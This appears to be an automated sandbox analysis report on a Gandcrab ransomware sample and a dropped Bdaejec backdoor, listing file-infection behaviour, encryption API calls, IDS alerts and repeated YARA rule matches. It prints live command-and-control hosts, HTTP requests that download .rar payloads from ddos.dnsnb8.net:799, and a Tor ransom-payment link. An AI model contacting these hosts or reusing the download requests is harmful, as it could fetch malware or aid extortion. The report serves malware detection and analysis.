                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.4:58565 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49707 -> 63.251.106.25:799
                    Source: TrafficSnort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49708 -> 63.251.106.25:799
                    Contains functionality to determine the online IP of the system
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com
                    Found Tor onion address
                    Source: SY5DeZW6pz.exe, 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                    Source: SY5DeZW6pz.exe, 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                    Source: SY5DeZW6pz.exeString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 799
                    Source: Joe Sandbox ViewASN Name: VOXEL-DOT-NETUS VOXEL-DOT-NETUS
                    Source: Joe Sandbox ViewIP Address: 63.251.106.25 63.251.106.25
                    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.4:49707 -> 63.251.106.25:799
                    Source: vSQshX.exe, 00000001.00000003.310095902.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.331514201.0000000000C23000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
                    Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/&
                    Source: vSQshX.exe, 00000001.00000000.334129715.00000000030C9000.00000004.00000010.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
                    Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar%
                    Source: vSQshX.exe, 00000001.00000002.360215641.00000000030C9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
                    Source: vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar%
                    Source: SY5DeZW6pz.exeString found in binary or memory: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                    Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comJames
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/scite
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comPraveen
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comYann
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comSteve
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintila.org/scite.rng
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
                    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comDenis
                    Source: SY5DeZW6pz.exeString found in binary or memory: https://tox.chat/download.html
                    Source: SY5DeZW6pz.exeString found in binary or memory: https://www.torproject.org/
                    Source: unknownDNS traffic detected: queries for: ddos.dnsnb8.net
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F397EF0 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,
                    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                    Source: SY5DeZW6pz.exe, 00000000.00000000.323985361.000000000178A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Yara detected Gandcrab
                    Source: Yara matchFile source: SY5DeZW6pz.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.353129829.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: SY5DeZW6pz.exe, type: SAMPLEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: SY5DeZW6pz.exe, type: SAMPLEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                    PE file has a writeable .text section
                    Source: vSQshX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    PE file contains section with special chars
                    Source: SY5DeZW6pz.exeStatic PE information: section name: |Zu8
                    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
                    Source: SY5DeZW6pz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SY5DeZW6pz.exe, type: SAMPLEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: SY5DeZW6pz.exe, type: SAMPLEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: SY5DeZW6pz.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: SY5DeZW6pz.exe, type: SAMPLEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
